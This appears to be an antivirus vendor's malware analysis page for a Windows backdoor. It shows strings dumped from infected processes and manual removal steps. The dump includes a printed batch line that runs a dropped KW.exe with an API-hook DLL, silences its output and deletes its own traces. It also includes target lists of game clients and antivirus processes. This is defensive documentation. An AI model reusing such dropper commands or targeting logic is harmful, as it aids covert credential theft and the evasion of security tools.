(*.*)|*.*||
Shell32.dll
Mpr.dll
Advapi32.dll
User32.dll
Gdi32.dll
Kernel32.dll
(&07-034/)7 '
?? / %d]
%d / %d]
: %d]
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
windows
out.prn
%d.%d
%d / %d
%d/%d
Bogus message code %d
(%d-%d):
%ld%c
USER32.DLL
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP/1.0
%s <%s>
Reply-To: %s
From: %s
To: %s
Subject: %s
Date: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
SMTP
.PAVCOleException@@
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCOleDispatchException@@
.PAVCArchiveException@@
zcÁ
t.exe
aft launcher.exe
lolclient.exe
launcher.exe
QQlogin.exe
DNFchina.exe
World of Warcraft Launcher.exe
my.exe
xy2.exe
360Safe.exe
360sd.exe
crossfire.exe
LOLBox.exe
LolClient.exe
%System%\svchost.exe
#include "l.chs\afxres.rc" // Standard components
(*.*)

cmd.exe_304:

.text
`.data
.rsrc
KERNEL32.dll
NTDLL.DLL
msvcrt.dll
USER32.dll
SetConsoleInputExeNameW
APerformUnaryOperation: '%c'
APerformArithmeticOperation: '%c'
ADVAPI32.dll
SHELL32.dll
MPR.dll
RegEnumKeyW
RegDeleteKeyW
RegCloseKey
RegOpenKeyW
RegCreateKeyExW
RegOpenKeyExW
ShellExecuteExW
CmdBatNotification
GetWindowsDirectoryW
GetProcessHeap
GetCPInfo
GetConsoleOutputCP
_pipe
GetProcessWindowStation
cmd.pdb
CMD Internal Error %s
)(&&())))(&))
)&((&)&))&())
)&((&)&)&()))
)(&&()))&))))
CMD.EXE
()|&=,;"
COPYCMD
\XCOPY.EXE
CMDCMDLINE
WKERNEL32.DLL
Software\Policies\Microsoft\Windows\System
0123456789
cmd.exe
DIRCMD
%d.%d.d
Ungetting: '%s'
DisableCMD
GeToken: (%x) '%s'
%s\Shell\Open\Command
%x %c
*** Unknown type: %x
Args: `%s'
Cmd: %s Type: %x
%s (%s) %s
tcher.exe" && @"C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\KW.exe" /e * APIHook_Dll.dll>nul 2>nul && del /q /f "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\"kw.* >nul 2>nul && exit
%System%\ping.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp>
.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
%WinDir%;%WinDir%\System32\Wbem;c:\Program Files\Wireshark
atcher.exe" && @"%~dp0KW.exe" /e * APIHook_Dll.dll>nul 2>nul && del /q /f "%~dp0"kw.* >nul 2>nul && exit
CMDEXTVERSION
KEYS
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp
operable program or batch file.
%s %s
(%s) %s
%s %s%s
&()[]{}^=;!%' ,`~
d%sd%s
-%sd%sd%sd
d%sd%sd
%s=%s
X-X
.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS
<> -*/%()|^&=,
\CMD.EXE
Windows Command Processor
5.1.2600.5512 (xpsp.080413-2111)
Cmd.Exe
Windows
Operating System
5.1.2600.5512
Press any key to continue . . . %0
The system cannot execute the specified program.
and press any key when ready. %0
Microsoft Windows XP [Version %1]%0
a pipe operation.
KEYS is on.
KEYS is off.
The process tried to write to a nonexistent pipe.
The switch /Y may be preset in the COPYCMD environment variable.
to prompt on overwrites unless COPY command is being executed from
Switches may be preset in the DIRCMD environment variable. Override
Quits the CMD.EXE program (command interpreter) or the current batch
CMD.EXE. If executed from outside a batch script, it
will quit CMD.EXE
ERRORLEVEL that number. If quitting CMD.EXE, sets the process
Displays or sets a search path for executable files.
Type PATH ; to clear all search-path settings and direct cmd.exe to search
Changes the cmd.exe command prompt.
$B | (pipe)
$V Windows XP version number
Displays, sets, or removes cmd.exe environment variables.
Displays the Windows XP version.
Tells cmd.exe whether to verify that your files are written correctly to a
Records comments (remarks) in a batch file or CONFIG.SYS.
Press any key to continue . . . %0
Directs cmd.exe to a labeled line in a batch program.
NOT Specifies that Windows XP should carry out
will execute the command after the ELSE keyword if the
I The new environment will be the original environment passed
to the cmd.exe and not the current environment.
SEPARATE Start 16-bit Windows program in separate memory space
SHARED Start 16-bit Windows program in shared memory space
If it is an internal cmd command or a batch file then
the command processor is run with the /K switch to cmd.exe.
If it is not an internal cmd command or batch file then
parameters These are the parameters passed to the command/program
under Windows XP.
Starts a new instance of the Windows XP command interpreter
CMD [/A | /U] [/Q] [/D] [/E:ON | /E:OFF] [/F:ON | /F:OFF] [/V:ON | /V:OFF]
/D Disable execution of AutoRun commands from registry (see below)
/A Causes the output of internal commands to a pipe or file to be ANSI
/U Causes the output of internal commands to a pipe or file to be
variable var at execution time. The %var% syntax expands variables
of an executable file.
If /D was NOT specified on the command line, then when CMD.EXE starts, it
either or both are present, they are executed first.
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\AutoRun
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun
can enable or disable extensions for all invocations of CMD.EXE on a
following REG_DWORD values in the registry using REGEDT32.EXE:
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\EnableExtensions
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\EnableExtensions
particular invocation of CMD.EXE with the /V:ON or /V:OFF switch. You
can enable or disable completion for all invocations of CMD.EXE on a
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\DelayedExpansion
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DelayedExpansion
at execution time.
CMD.EXE with the /F:ON or /F:OFF switch. You can enable or disable
completion for all invocations of CMD.EXE on a machine and/or user logon
the registry using REGEDT32.EXE:
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\CompletionChar
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\PathCompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\CompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\PathCompletionChar
Shift key with the control character will move through the list
&()[]{}^=;!%' ,`~
Command Processor Extensions enabled by default. Use CMD /? for details.
ASSOC [.ext[=[fileType]]]
.ext Specifies the file extension to associate the file type with
ASSOC .pl=PerlScript
FTYPE PerlScript=perl.exe %%1 %%*
script.pl 1 2 3
set PATHEXT=.pl;%%PATHEXT%%
The restartable option to the COPY command is not supported by
this version of the operating system.
The following usage of the path operator in batch-parameter
The unicode output option to CMD.EXE is not supported by this
version of the operating system.
If Command Extensions are enabled the DATE command supports
If Command Extensions are enabled the TIME command supports
If Command Extensions are enabled the PROMPT command supports
is pretty simple and supports the following operations, in decreasing
! ~ - - unary operators
* / %% - arithmetic operators
  - - arithmetic operators
&= ^= |= <<= >>=
If you use any of the logical or modulus operators, you will need to
values. If SET /A is executed from the command line outside of a
assignment operator requires an environment variable name to the left of
the assignment operator. Numeric values are decimal numbers, unless
occurrence of the remaining portion of str1.
Finally, support for delayed environment variable expansion has been
added. This support is always disabled by default, but may be
enabled/disabled via the /V command line switch to CMD.EXE. See CMD /?
of text is read, not when it is executed. The following example
So the actual FOR loop we are executing is:
%Í%% - expands to the current directory string.
%ÚTE%% - expands to current date using same format as DATE command.
%%CMDEXTVERSION%% - expands to the current Command Processor Extensions
%%CMDCMDLINE%% - expands to the original command line that invoked the
If Command Extensions are enabled the SHIFT command supports
control is passed to the statement after the label specified. You must
%%4 %%5 ...)
CMD /? for details.
This works because on old versions of CMD.EXE, SETLOCAL does NOT
command execution.
non-executable files may be invoked through their file association just
by typing the name of the file as a command. (e.g. WORD.DOC would
launch the application associated with the .DOC file extension).
When executing an application that is a 32-bit GUI application, CMD.EXE
the command prompt. This new behavior does NOT occur if executing
When executing a command line whose first token is the string "CMD "
without an extension or path qualifier, then "CMD" is replaced with
the value of the COMSPEC variable. This prevents picking up CMD.EXE
When executing a command line whose first token does NOT contain an
extension, then CMD.EXE uses the value of the PATHEXT
.COM;.EXE;.BAT;.CMD
When searching for an executable, if there is no match on any extension,
If Command Extensions are enabled, and running on the Windows XP
forms of the FOR command are supported:
Walks the directory tree rooted at [drive:]path, executing the FOR
passes the first blank separated token from each line of each file.
is a quoted string which contains one or more keywords to specify
different parsing options. The keywords are:
be passed to the for body for each iteration.
where a back quoted string is executed as a
FOR /F "eol=; tokens=2,3* delims=, " %%i in (myfile.txt) do @echo %%i %%j %%k
would parse each line in myfile.txt, ignoring lines that begin with
a semicolon, passing the 2nd and 3rd token from each line to the for
line, which is passed to a child CMD.EXE and the output is captured
IF CMDEXTVERSION number command
The CMDEXTVERSION conditional works just like ERRORLEVEL, except it is
CMDEXTVERSION conditional is never true when Command Extensions are
%%CMDCMDLINE%% will expand into the original command line passed to
CMD.EXE prior to any processing by CMD.EXE, provided that there is not
already an environment variable with the name CMDCMDLINE, in which case
%%CMDEXTVERSION%% will expand into a string representation of the
current value of CMDEXTVERSION, provided that there is not already
an environment variable with the name CMDEXTVERSION, in which case you
under Windows XP, as command line editing is always enabled.
CMD.EXE was started with the above path as the current directory.
UNC paths are not supported. Defaulting to Windows directory.
CMD does not support UNC paths as current directories.
UNC paths not supported for current directory. Using
to create temporary drive letter to support UNC current
Missing operand.
Missing operator.
The COMSPEC environment variable does not point to CMD.EXE.
The FAT File System only support Last Write Times
of a batch script is reached, an implied ENDLOCAL is executed for any
application execution.
The switch /Y may be present in the COPYCMD environment variable.
to prompt on overwrites unless MOVE command is being executed from
when CMD.EXE started. This value either comes from the current console
The COLOR command sets ERRORLEVEL to 1 if an attempt is made to execute

svchost.exe_1724:

.text
`.data
.rsrc
ADVAPI32.dll
KERNEL32.dll
NTDLL.DLL
RPCRT4.dll
NETAPI32.dll
ole32.dll
ntdll.dll
RegCloseKey
RegOpenKeyExW
GetProcessHeap
NtOpenKey
svchost.pdb
\PIPE\
Software\Microsoft\Windows NT\CurrentVersion\Svchost
\Registry\Machine\System\CurrentControlSet\Control\SecurePipeServers\
5.1.2600.5512 (xpsp.080413-2111)
svchost.exe
Windows
Operating System
5.1.2600.5512

ping.exe_552:

.text
`.data
.rsrc
msvcrt.dll
ADVAPI32.dll
KERNEL32.dll
NTDLL.DLL
iphlpapi.dll
USER32.dll
WS2_32.dll
SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
ping.pdb
RegCloseKey
RegOpenKeyExA
TCP/IP Ping Command
5.1.2600.5512 (xpsp.080413-0852)
ping.exe
Windows
Operating System
5.1.2600.5512
Destination port unreachable.
Unable to initialize Windows Sockets interface, error code %1!d!.
%1 [%2] %0
%1 [%2] : %0


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    WScript.exe:320
    535.exe:2004
    tasklist.exe:1868
    tasklist.exe:1620
    tasklist.exe:212
    tasklist.exe:816
    tasklist.exe:1996
    %original file name%.exe:1848
    wuauclt.exe:540
    RarExel.exe:644
    killwatcher.exe:512
    ping.exe:1832
    ping.exe:1996
    ping.exe:1260
    ping.exe:436
    ping.exe:548
    ping.exe:232
    find.exe:1712
    find.exe:1300
    find.exe:1200
    find.exe:1480
    find.exe:240
    find.exe:2004

  2. Delete the original Backdoor file.
  3. Delete or disinfect the following files created/modified by the Backdoor:

    %WinDir%\Temp\WinService.dll (131 bytes)
    %WinDir%\killwatcher.exe (103 bytes)
    %WinDir%\nsink.txt (34 bytes)
    %Program Files%\WinRAR\RarExel.exe (3073 bytes)
    C:\Hook.dll (4 bytes)
    %WinDir%\iiis.txt (2 bytes)
    %WinDir%\SoftwareDistribution\DataStore\Logs\edb.chk (100 bytes)
    %WinDir%\SoftwareDistribution\DataStore\Logs\edb.log (2016 bytes)
    %WinDir%\SoftwareDistribution\DataStore\DataStore.edb (100 bytes)
    %Documents and Settings%\%current user%\Application Data\535.exe (94 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\kw.cmd (365 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\kw.vbs (93 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\KW.exe (800 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2026 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now